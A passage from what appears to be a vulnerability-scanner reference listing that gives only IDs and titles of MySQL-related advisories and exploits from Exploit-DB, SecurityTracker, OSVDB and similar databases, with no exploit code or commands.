10491| [28448] MySQL case sensitive database name privilege escalation
10492| [28442] MySQL GRANT EXECUTE privilege escalation
10493| [28387] FunkBoard admin/mysql_install.php and admin/pg_install.php unauthorized access
10494| [28202] MySQL multiupdate subselect query denial of service
10495| [28180] MySQL MERGE table security bypass
10496| [28176] PHP MySQL Banner Exchange lib.inc information disclosure
10497| [27995] Opsware Network Automation System MySQL plaintext password
10498| [27904] MySQL date_format() format string
10499| [27635] MySQL Instance Manager denial of service
10500| [27212] MySQL SELECT str_to_date denial of service
10501| [26875] MySQL ASCII escaping SQL injection
10502| [26420] Apple Mac OS X MySQL Manager blank password
10503| [26236] MySQL login packet information disclosure
10504| [26232] MySQL COM_TABLE_DUMP buffer overflow
10505| [26228] MySQL sql_parce.cc information disclosure
10506| [26042] MySQL running
10507| [25313] WoltLab Burning Board class_db_mysql.php cross-site scripting
10508| [24966] MySQL mysql_real_query logging bypass
10509| [24653] PAM-MySQL logging function denial of service
10510| [24652] PAM-MySQL authentication double free code execution
10511| [24567] PHP/MYSQL Timesheet index.php and changehrs.php SQL injection
10512| [24095] PHP ext/mysqli exception handling format string
10513| [23990] PHP mysql_connect() buffer overflow
10514| [23596] MySQL Auction search module could allow cross-site scripting
10515| [22642] RHSA-2005:334 updates for mysql not installed
10516| [21757] MySQL UDF library functions command execution
10517| [21756] MySQL LoadLibraryEx function denial of service
10518| [21738] MySQL UDF mysql_create_function function directory traversal
10519| [21737] MySQL user defined function buffer overflow
10520| [21640] MySQL Eventum multiple class SQL injection
10521| [21638] MySQL Eventum multiple scripts cross-site scripting
10522| [20984] xmysqladmin temporary file symlink
10523| [20656] MySQL mysql_install_db script symlink
10524| [20333] Plans MySQL password information disclosure
10525| [19659] MySQL CREATE TEMPORARY TABLE command creates insecure files
10526| [19658] MySQL udf_init function gain access
10527| [19576] auraCMS mysql_fetch_row function path disclosure
10528| [18922] MySQL mysqlaccess script symlink attack
10529| [18824] MySQL UDF root privileges
10530| [18464] mysql_auth unspecified vulnerability
10531| [18449] Sugar Sales plaintext MySQL password
10532| [17783] MySQL underscore allows elevated privileges
10533| [17768] MySQL MATCH ... AGAINST SQL statement denial of service
10534| [17667] MySQL UNION change denial of service
10535| [17666] MySQL ALTER TABLE RENAME bypass restriction
10536| [17493] MySQL libmysqlclient bulk inserts buffer overflow
10537| [17462] MySQLGuest AWSguest.php script cross-site scripting
10538| [17047] MySQL mysql_real_connect buffer overflow
10539| [17030] MySQL mysqlhotcopy insecure temporary file
10540| [16612] MySQL my_rnd buffer overflow
10541| [16604] MySQL check_scramble_323 function allows unauthorized access
10542| [15883] MySQL mysqld_multi script symlink attack
10543| [15617] MySQL mysqlbug script symlink attack
10544| [15417] Confixx db_mysql_loeschen2.php SQL injection
10545| [15280] Proofpoint Protection Server MySQL allows unauthorized access
10546| [13404] HP Servicecontrol Manager multiple vulnerabilities in MySQL could allow execution of code
10547| [13153] MySQL long password buffer overflow
10548| [12689] MySQL AB ODBC Driver stores ODBC passwords and usernames in plain text
10549| [12540] Teapop PostSQL and MySQL modules SQL injection
10550| [12337] MySQL mysql_real_connect function buffer overflow
10551| [11510] MySQL datadir/my.cnf modification could allow root privileges
10552| [11493] mysqlcc configuration and connection files are world writable
10553| [11340] SuckBot mod_mysql_logger denial of service
10554| [11199] MySQL mysql_change_user() double-free memory pointer denial of service
10555| [10850] MySQL libmysql client read_one_row buffer overflow
10556| [10849] MySQL libmysql client read_rows buffer overflow
10557| [10848] MySQL COM_CHANGE_USER password buffer overflow
10558| [10847] MySQL COM_CHANGE_USER command password authentication bypass
10559| [10846] MySQL COM_TABLE_DUMP unsigned integer denial of service
10560| [10483] Bugzilla stores passwords in plain text in the MySQL database
10561| [10455] gBook MySQL could allow administrative access
10562| [10243] MySQL my.ini "
10563| [9996] MySQL SHOW GRANTS command discloses adminstrator`s encrypted password
10564| [9909] MySQL logging disabled by default on Windows
10565| [9908] MySQL binding to the loopback adapter is disabled
10566| [9902] MySQL default root password could allow unauthorized access
10567| [8748] Cyrus SASL LDAP+MySQL patch allows user unauthorized POP access
10568| [8105] PHP MySQL client library allows an attacker to bypass safe_mode restrictions
10569| [7923] Conectiva Linux MySQL /var/log/mysql file has insecure permissions
10570| [7206] WinMySQLadmin stores MySQL password in plain text
10571| [6617] MySQL "
10572| [6419] MySQL drop database command buffer overflow
10573| [6418] MySQL libmysqlclient.so buffer overflow
10574| [5969] MySQL select buffer overflow
10575| [5447] pam_mysql authentication input
10576| [5409] MySQL authentication algorithm obtain password hash
10577| [5057] PCCS MySQL Database Admin Tool could reveal username and password
10578| [4228] MySQL unauthenticated remote access
10579| [3849] MySQL default test account could allow any user to connect to the database
10580| [1568] MySQL creates readable log files
10581|
10582| Exploit-DB - https://www.exploit-db.com:
10583| [30744] MySQL <= 5.1.23 Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability
10584| [30020] MySQL 5.0.x - IF Query Handling Remote Denial of Service Vulnerability
10585| [29724] MySQL 5.0.x Single Row SubSelect Remote Denial of Service Vulnerability
10586| [27326] MySQL 5.0.18 Query Logging Bypass Vulnerability
10587| [23073] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
10588| [20044] Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers
10589| [18269] MySQL 5.5.8 - Remote Denial of Service (DOS)
10590| [15467] Oracle MySQL < 5.1.49 'WITH ROLLUP' Denial of Service Vulnerability
10591| [9085] MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)
10592| [4615] MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability
10593| [4392] PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability
10594| [1742] MySQL (<= 4.1.18, 5.0.20) Local/Remote Information Leakage Exploit
10595| [1741] MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit
10596|
10597| OpenVAS (Nessus) - http://www.openvas.org:
10598| [53251] Debian Security Advisory DSA 562-1 (mysql)
10599| [53230] Debian Security Advisory DSA 540-1 (mysql)
10600|
10601| SecurityTracker - https://www.securitytracker.com:
10602| [1028790] MySQL Multiple Bugs Let Remote Users Deny Service and Partially Access and Modify Data
10603| [1028449] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service and Partially Access and Modify Data
10604| [1028004] MySQL Multiple Bugs Let Remote Authenticated Users Take Full Control or Deny Service and Let Local Users Access and Modify Data
10605| [1027829] MySQL Bug in UpdateXML() Lets Remote Authenticated Users Deny Service
10606| [1027828] MySQL Heap Overflow May Let Remote Authenticated Users Execute Arbitrary Code
10607| [1027827] MySQL Stack Overflow May Let Remote Authenticated Users Execute Arbitrary Code
10608| [1027665] MySQL Multiple Bugs Let Remote Authenticated Users Access and Modify Data and Deny Service and Local Users Access Data
10609| [1027263] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service
10610| [1027143] MySQL memcmp() Comparison Error Lets Remote Users Bypass Authentication
10611| [1026934] MySQL Multiple Bugs Let Remote Users Deny Service
10612| [1026896] MySQL Unspecified Flaws Have Unspecified Impact
10613| [1026659] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
10614| [1026530] MySQL Multiple Bugs Let Local and Remote Users Partially Access and Modifiy Data and Partially Deny Service
10615| [1024508] MySQL Replication Flaw Lets Remote Authenticated Users Gain Elevated Privileges
10616| [1024507] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
10617| [1024360] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
10618| [1024160] MySQL ALTER DATABASE Processing Error Lets Remote Authenticated Users Deny Service
10619| [1024033] MySQL COM_FIELD_LIST Packet Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code
10620| [1024032] MySQL Large Packet Processing Flaw in my_net_skip_rest() Lets Remote Users Deny Service
10621| [1024031] MySQL COM_FIELD_LIST Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
10622| [1024004] MySQL mi_delete_table() Symlink Flaw Lets Remote Authenticated Users Delete Data and Index Files
10623| [1023402] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
10624| [1023220] MySQL Client Fails to Check Server Certificates in Certain Cases
10625| [1022812] MySQL Unspecified Buffer Overflow Lets Remote Users Execute Arbitrary Code
10626| [1022533] MySQL Format String Bug in dispatch_command() Lets Remote Users Deny Service
10627| [1022482] MySQL Connector/Net is Missing SSL Certificate Validation
10628| [1021786] MySQL Bug in ExtractValue()/UpdateXML() in Processing XPath Expressions Lets Remote Authenticated Users Deny Service
10629| [1021714] (Red Hat Issues Fix) mod_auth_mysql Input Validation Flaw Lets Remote Users Inject SQL Commands
10630| [1020858] MySQL Item_bin_string::Item_bin_string() Binary Value Processing Bug Lets Remote Authenticated Users Deny Service
10631| [1019995] MySQL MyISAM Options Let Local Users Overwrite Table Files
10632| [1019085] MySQL Bugs Let Remote Authenticated Users Gain Elevated Privileges and Deny Service
10633| [1019084] MySQL DATA DIRECTORY and INDEX DIRECTORY Options May Let Remote Authenticated Users Gain Elevated Privileges
10634| [1019083] MySQL BINLOG Filename Path Bug May Let Remote Authenticated Users Gain Elevated Privileges
10635| [1019060] MySQL Rename Table Bug Lets Remote Authenticated Users Modify System Table Information
10636| [1018978] MySQL convert_search_mode_to_innobase() Bug Lets Remote Authenticated Users Deny Service
10637| [1018824] Asterisk-Addons Input Validation Flaw in cdr_addon_mysql Lets Remote Users Inject SQL Commands
10638| [1018663] MySQL Table View Access Bug Lets Remote Authenticated Users Gain Elevated Privileges
10639| [1018629] MySQL Authentication Protocol Bug Lets Remote Users Deny Service
10640| [1018071] MySQL ALTER TABLE Function Lets Remote Authenticated Users Obtain Potentially Sensitive Information
10641| [1018070] MySQL SQL SECURITY INVOKER Routines Let Remote Authenticated Users Gain Elevated Privileges
10642| [1018069] MySQL Lets Remote Authenticated Users Issue the RENAME TABLE Command
10643| [1017746] MySQL Single Row Subselect Statements Let Remote Users Deny Service
10644| [1016790] MySQL Replication Error Lets Local Users Deny Service
10645| [1016710] MySQL Case-Sensitive Database Names May Let Users Access Restricted Databases
10646| [1016709] MySQL Error in Checking suid Routine Arguments May Let Users Gain Elevated Privileges
10647| [1016617] MySQL MERGE Access Control Error May Let Users Access a Restricted Table
10648| [1016566] Opsware Network Automation System Discloses MySQL Password to Local Users
10649| [1016216] MySQL Error in Parsing Multibyte Encoded Data in mysql_real_escape() Lets Remote Users Inject SQL Commands
10650| [1016077] Apple MySQL Manager Database Initialization Bug May Let Local Users Access the Database
10651| [1016017] MySQL Anonymous Login Processing May Disclose Some Memory Contents to Remote Users
10652| [1016016] MySQL COM_TABLE_DUMP Processing Lets Remote Authenticated Users Execute Arbitrary Code or Obtain Information
10653| [1015789] Woltlab Burning Board Input Validation Hole in 'class_db_mysql.php' Permits Cross-Site Scripting Attacks
10654| [1015693] MySQL Query Bug Lets Remote Users Bypass Query Logging
10655| [1015603] PAM-MySQL pam_get_item() Double Free May Let Remote Users Execute Arbitrary Code
10656| [1015485] PHP mysqli Extension Error Mode Format String Flaw May Let Users Execute Arbitrary Code
10657| [1014603] MySQL Eventum Input Validation Hole in 'class.auth.php' Permits SQL Injection and Other Input Validation Bugs Permit Cross-Site Scripting Attacks
10658| [1014172] xMySQLadmin Lets Local Users Delete Files
10659| [1013995] MySQL 'mysql_install_db' Uses Unsafe Temporary Files and May Let Local Users Gain Elevated Privilege
10660| [1013994] MySQL Non-existent '--user' Error May Allow the Database to Run With Incorrect Privileges
10661| [1013415] MySQL CREATE FUNCTION Lets Authenticated Users Invoke libc Functions to Execute Arbitrary Code
10662| [1013414] MySQL udf_init() Path Validation Flaw Lets Authenticated Users Execute Arbitrary Libraries
10663| [1013413] MySQL CREATE TEMPORARY TABLE Uses Predictable Temporary Files That May Let Users Gain Elevated Privileges
10664| [1012914] MySQL 'mysqlaccess.sh' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
10665| [1012893] MySQL MaxDB Buffer Overflow in websql Password Parameter Lets Remote Users Execute Arbitrary Code
10666| [1012500] mysql_auth Memory Leak Has Unspecified Impact
10667| [1011741] MySQL Access Control Error in Databases With Underscore Wildcard Character May Grant Unauthorized Access
10668| [1011606] MySQL May Let Remote Authenticated Users Access Restricted Tables or Crash the System
10669| [1011408] MySQL libmysqlclient Buffer Overflow in Executing Prepared Statements Has Unspecified Impact
10670| [1011376] MySQLGuest Lack of Input Validation Lets Remote Users Conduct Cross-Site Scripting Attacks
10671| [1011008] MySQL Buffer Overflow in mysql_real_connect() May Let Remote Users Execute Arbitrary Code
10672| [1010979] MySQL 'mysqlhotcopy' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
10673| [1010645] MySQL check_scramble_323() Zero-Length Comparison Lets Remote Users Bypass Authentication
10674| [1009784] MySQL 'mysqld_multi' Temporary File Flaw Lets Local Users Overwrite Files
10675| [1009554] MySQL 'mysqlbug' Temporary File Flaw Lets Local Users Overwrite Files
10676| [1007979] MySQL mysql_change_user() Double Free Error Lets Remote Authenticated Users Crash mysqld
10677| [1007673] MySQL acl_init() Buffer Overflow Permits Remote Authenticated Administrators to Execute Arbitrary Code
10678| [1007518] DWebPro Discloses MySQL Database Password to Local Users
10679| [1007312] MySQL World-Writable Configuration File May Let Local Users Gain Root Privileges
10680| [1006976] MySQL Buffer Overflow in 'mysql_real_connect()' Client Function May Let Remote or Local Users Execute Arbitrary Code
10681| [1005800] MySQL Overflow and Authentication Bugs May Let Remote Users Execute Code or Access Database Accounts
10682| [1005345] MySQL Buffer Overflow Lets Local Users Gain System Privileges on Windows NT
10683| [1004506] vBulletin PHP-based Forum Software Has Unspecified Security Flaw in the 'db_mysql.php' Module
10684| [1004172] PHP-Survey Script Discloses Underlying MySQL Database Username and Password to Remote Users
10685| [1003955] 3rd Party Patch for Cyrus SASL ('auxprop for mysql and ldap') Lets Remote Users Access Protected POP Mail Accounts Without Authentication
10686| [1003290] Conectiva Linux MySQL Distribution May Allow Local Users to Obtain Sensitive Information
10687| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
10688| [1002485] WinMySQLadmin Database Administration Tool Discloses MySQL Password to Local Users
10689| [1002324] Vpopmail Mail Server Discloses Database Password to Local Users When Installed with MySQL
10690| [1001411] phpMyAdmin Administration Tool for MySQL Allows Remote Users to Execute Commands on the Server
10691| [1001118] MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
10692|
10693| OSVDB - http://www.osvdb.org:
10694| [95337] Oracle MySQL Server XA Transactions Subcomponent Unspecified Remote DoS
10695| [95336] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
10696| [95335] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
10697| [95334] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue
10698| [95333] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
10699| [95332] Oracle MySQL Server Parser Subcomponent Unspecified Remote DoS
10700| [95331] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3801)
10701| [95330] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3808)
10702| [95329] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3796)
10703| [95328] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3804)
10704| [95327] Oracle MySQL Server Prepared Statements Subcomponent Unspecified Remote DoS
10705| [95326] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
10706| [95325] Oracle MySQL Server Full Text Search Subcomponent Unspecified Remote DoS
10707| [95324] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3795)
10708| [95323] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3793)
10709| [95322] Oracle MySQL Server Audit Log Subcomponent Unspecified Remote Issue
10710| [95321] Oracle MySQL Server MemCached Subcomponent Unspecified Remote Issue
10711| [95131] AutoMySQLBackup /usr/sbin/automysqlbackup Database Name Arbitrary Code Injection
10712| [94076] Debian Linux MySQL Server mysql-server-5.5.postinst Race Condition debian.cnf Plaintext Credential Local Disclosure
10713| [93505] Wireshark MySQL Dissector (packet-mysql.c) Malformed Packet Handling Infinite Loop Remote DoS
10714| [93174] MySQL Crafted Derived Table Handling DoS
10715| [92967] MySQL2JSON (mn_mysql2json) Extension for TYPO3 Unspecified SQL Injection
10716| [92950] MySQL Running START SLAVE Statement Process Listing Plaintext Local Password Disclosure
10717| [92485] Oracle MySQL Server Partition Subcomponent Unspecified Local DoS
10718| [92484] Oracle MySQL Server Locking Subcomponent Unspecified Remote DoS (2013-1506)
10719| [92483] Oracle MySQL Server Install Subcomponent Unspecified Local Issue
10720| [92482] Oracle MySQL Server Types Subcomponent Unspecified Remote DoS
10721| [92481] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2381)
10722| [92480] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1566)
10723| [92479] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1511)
10724| [92478] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1567)
10725| [92477] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
10726| [92476] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
10727| [92475] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
10728| [92474] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS
10729| [92473] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-2389)
10730| [92472] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
10731| [92471] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1512)
10732| [92470] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1544)
10733| [92469] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote Issue
10734| [92468] Oracle MySQL Server MemCached Subcomponent Unspecified Remote DoS
10735| [92467] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2375)
10736| [92466] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-1531)
10737| [92465] Oracle MySQL Server Server Subcomponent Unspecified Remote Issue
10738| [92464] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Issue
10739| [92463] Oracle MySQL Server Locking Subcomponent Unspecified Remote Issue (2013-1521)
10740| [92462] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-2395)
10741| [91536] Oracle MySQL yaSSL Unspecified Overflow (2012-0553)
10742| [91534] Oracle MySQL yaSSL Unspecified Overflow (2013-1492)
10743| [91415] MySQL Raw Geometry Object String Conversion Remote DoS
10744| [91108] Juju mysql Charm Install Script mysql.passwd MySQL Password Plaintext Local Disclosure
10745| [89970] Site Go /site-go/admin/extra/mysql/index.php idm Parameter Traversal Arbitrary File Access
10746| [89265] Oracle MySQL Server Server Privileges Subcomponent Unspecified Remote DoS
10747| [89264] Oracle MySQL Server Server Partition Subcomponent Unspecified Remote DoS
10748| [89263] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-0578)
10749| [89262] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-1705)
10750| [89261] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-0574)
10751| [89260] Oracle MySQL Server MyISAM Subcomponent Unspecified Remote DoS
10752| [89259] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2012-0572)
10753| [89258] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-0368)
10754| [89257] Oracle MySQL Server Server Locking Subcomponent Unspecified Remote DoS
10755| [89256] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-1702)
10756| [89255] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote Issue
10757| [89254] Oracle MySQL Server Server Replication Subcomponent Unspecified Local Issue
10758| [89253] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
10759| [89252] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS
10760| [89251] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
10761| [89250] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
10762| [89042] ViciBox Server MySQL cron Service Default Credentials
10763| [88415] Oracle MySQL Server COM_CHANGE_USER Account Password Brute-Force Weakness
10764| [88118] Oracle MySQL Server FILE Privilege Database Privilege Escalation
10765| [88067] Oracle MySQL Server Authentication Error Message User Enumeration
10766| [88066] Oracle MySQL Server for Linux Access Rights Checking Routine Database Name Handling Stack Buffer Overflow
10767| [88065] Oracle MySQL Server COM_BINLOG_DUMP Invalid Data Handling DoS
10768| [88064] Oracle MySQL Server Multiple-Table DELETE Heap Buffer Overflow
10769| [87704] CodeIgniter MySQL / MySQLi Driver Database Client Multi-byte Character Set Unspecified SQL Injection
10770| [87507] Oracle MySQL Statement Logging Multiple Log Plaintext Local Password Disclosure
10771| [87501] Oracle MySQL optimizer_switch Malformed Value Processing Local DoS
10772| [87494] Oracle MySQL on Windows Field_new_decimal::store_value dbug_buff Variable Overflow DoS
10773| [87480] MySQL Malformed XML Comment Handling DoS
10774| [87466] MySQL SSL Certificate Revocation Weakness
10775| [87356] Oracle MySQL do_div_mod DIV Expression Handling Remote DoS
10776| [87355] Oracle MySQL handler::pushed_cond Table Cache Handling mysqld DoS
10777| [87354] Oracle MySQL Polygon Union / Intersection Spatial Operations DoS
10778| [86273] Oracle MySQL Server Server Installation Subcomponent Unspecified Local Information Disclosure
10779| [86272] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote DoS
10780| [86271] Oracle MySQL Server Server Full Text Search Subcomponent Unspecified Remote DoS
10781| [86270] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3156)
10782| [86269] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Information Disclosure
10783| [86268] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3180)
10784| [86267] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3150)
10785| [86266] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3144)
10786| [86265] Oracle MySQL Server InnoDB Plugin Subcomponent Unspecified Remote DoS
10787| [86264] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
10788| [86263] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Issue
10789| [86262] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3177)
10790| [86261] Oracle MySQL Server Protocol Subcomponent Unspecified Remote Issue
10791| [86260] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Code Execution
10792| [86175] Oracle MySQL on Windows Path Subversion Arbitrary DLL Injection Code Execution
10793| [85155] Icinga module/idoutils/db/scripts/create_mysqldb.sh Icinga User Database Access Restriction Bypass
10794| [84755] Oracle MySQL Sort Order Index Calculation Remote DoS
10795| [84719] MySQLDumper index.php page Parameter XSS
10796| [84680] MySQL Squid Access Report access.log File Path XSS
10797| [83980] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1689)
10798| [83979] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1734)
10799| [83978] Oracle MySQL Server Subcomponent Unspecified Remote DoS
10800| [83977] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
10801| [83976] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
10802| [83975] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1735)
10803| [83661] Oracle MySQL Unspecified Issue (59533)
10804| [82804] Oracle MySQL Authentication Protocol Token Comparison Casting Failure Password Bypass
10805| [82803] Oracle MySQL Unspecified Issue (59387)
10806| [82120] Oracle MySQL Version Specific Comment Handling Arbitrary SQL Command Execution
10807| [81897] Viscacha classes/database/mysql.inc.php Multiple Parameter SQL Injection
10808| [81616] MySQLDumper Multiple Script Direct Request Information Disclosure
10809| [81615] MySQLDumper filemanagement.php f Parameter Traversal Arbitrary File Access
10810| [81614] MySQLDumper File Upload PHP Code Execution
10811| [81613] MySQLDumper main.php Multiple Function CSRF
10812| [81612] MySQLDumper restore.php filename Parameter XSS
10813| [81611] MySQLDumper sql.php Multiple Parameter XSS
10814| [81610] MySQLDumper install.php Multiple Parameter XSS
10815| [81609] MySQLDumper install.php language Parameter Traversal Arbitrary File Access
10816| [81378] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1690)
10817| [81377] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1696)
10818| [81376] Oracle MySQL Server Server DML Component Unspecified Remote DoS
10819| [81375] Oracle MySQL Server Partition Component Unspecified Remote DoS
10820| [81374] Oracle MySQL Server MyISAM Component Unspecified Remote DoS
10821| [81373] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1703)
10822| [81059] Oracle MySQL Server Multiple Unspecified Issues
10823| [79038] Webmin Process Listing MySQL Password Local Disclosure
10824| [78919] Oracle MySQL Unspecified Pre-authentication Remote Code Execution
10825| [78710] WordPress wp-admin/setup-config.php MySQL Query Saturation Brute-Force Proxy Weakness
10826| [78708] WordPress wp-admin/setup-config.php MySQL Database Verification Code Injection Weakness
10827| [78707] WordPress wp-admin/setup-config.php MySQL Credentials Error Message Brute-Force Weakness
10828| [78394] Oracle MySQL Server Unspecified Remote DoS (2012-0493)
10829| [78393] Oracle MySQL Server Unspecified Remote DoS (2012-0492)
10830| [78392] Oracle MySQL Server Unspecified Remote DoS (2012-0117)
10831| [78391] Oracle MySQL Server Unspecified Remote DoS (2012-0112)
10832| [78390] Oracle MySQL Server Unspecified Remote DoS (2012-0495)
10833| [78389] Oracle MySQL Server Unspecified Remote DoS (2012-0491)
10834| [78388] Oracle MySQL Server Unspecified Remote DoS (2012-0490)
10835| [78387] Oracle MySQL Server Unspecified Remote DoS (2012-0489)
10836| [78386] Oracle MySQL Server Unspecified Remote DoS (2012-0488)
10837| [78385] Oracle MySQL Server Unspecified Remote DoS (2012-0487)
10838| [78384] Oracle MySQL Server Unspecified Remote DoS (2012-0486)
10839| [78383] Oracle MySQL Server Unspecified Remote DoS (2012-0485)
10840| [78382] Oracle MySQL Server Unspecified Remote DoS (2012-0120)
10841| [78381] Oracle MySQL Server Unspecified Remote DoS (2012-0119)
10842| [78380] Oracle MySQL Server Unspecified Remote DoS (2012-0115)
10843| [78379] Oracle MySQL Server Unspecified Remote DoS (2012-0102)
10844| [78378] Oracle MySQL Server Unspecified Remote DoS (2012-0101)
10845| [78377] Oracle MySQL Server Unspecified Remote DoS (2012-0087)
10846| [78376] Oracle MySQL Server Unspecified Remote DoS (2011-2262)
10847| [78375] Oracle MySQL Server Unspecified Local DoS
10848| [78374] Oracle MySQL Server Unspecified Remote Issue (2012-0075)
10849| [78373] Oracle MySQL Server Unspecified Local Issue
10850| [78372] Oracle MySQL Server Unspecified Remote Information Disclosure
10851| [78371] Oracle MySQL Server Unspecified Remote Issue (2012-0496)
10852| [78370] Oracle MySQL Server Unspecified Remote Issue (2012-0118)
10853| [78369] Oracle MySQL Server Unspecified Remote Issue (2012-0116)
10854| [78368] Oracle MySQL Server Unspecified Remote Issue (2012-0113)
10855| [78283] Oracle MySQL NULL Pointer Dereference Packet Parsing Remote DoS
10856| [77042] e107 CMS install_.php MySQL Server Name Parsing Remote PHP Code Execution
10857| [77040] DBD::mysqlPP Unspecified SQL Injection
10858| [75888] TaskFreak! multi-mysql Multiple Script Direct Request Path Disclosure
10859| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
10860| [73555] Prosody MySQL Value Column Invalid Data Type Handling DoS
10861| [73387] Zend Framework PDO_MySql Character Set Security Bypass
10862| [72836] Arctic Fox CMS Multiple Script Direct Request MySQL Settings Disclosure
10863| [72660] MySQL GUI Tools Administrator / Query Browser Command Line Credentials Local Disclosure
10864| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
10865| [71368] Accellion File Transfer Appliance Weak MySQL root Password
10866| [70967] MySQL Eventum Admin User Creation CSRF
10867| [70966] MySQL Eventum preferences.php full_name Parameter XSS
10868| [70961] MySQL Eventum list.php Multiple Parameter XSS
10869| [70960] MySQL Eventum forgot_password.php URI XSS
10870| [70947] PyWebDAV DAVServer/mysqlauth.py get_userinfo() Multiple Parameter SQL Injection
10871| [70610] PHP MySQLi Extension set_magic_quotes_runtime Function mysqli_fetch_assoc Function Interaction Weakness
10872| [69885] SilverStripe modules/sapphire/trunk/core/model/MySQLDatabase.php showqueries Parameter SQL Command Disclosure
10873| [69395] MySQL Derived Table Grouping DoS
10874| [69394] MySQL Temporary Table Expression Re-Evaluation DoS
10875| [69393] MySQL GROUP_CONCAT() WITH ROLLUP Modifier DoS
10876| [69392] MySQL Extreme-Value Functions Mixed Arguments DoS
10877| [69391] MySQL Stored Procedures / Prepared Statements Nested Joins DoS
10878| [69390] MySQL Extreme-Value Functions Argument Parsing Type Error DoS
10879| [69389] MySQL CONVERT_TZ() Function Empty SET Column DoS
10880| [69388] MySQL InnoDB Storage Engine Table Handling Overflow
10881| [69387] MySQL LIKE Predicates Pre-Evaluation DoS
10882| [69001] MySQL PolyFromWKB() Function WKB Data Remote DoS
10883| [69000] MySQL HANDLER Interface Unspecified READ Request DoS
10884| [68997] MySQL Prepared-Statement Mode EXPLAIN DoS
10885| [68996] MySQL EXPLAIN EXTENDED Statement DoS
10886| [68995] MySQL GeometryCollection non-Geometry Value Assignment DoS
10887| [67488] phpMyAdmin libraries/dbi/mysqli.dbi.lib.php Unspecified Parameter XSS
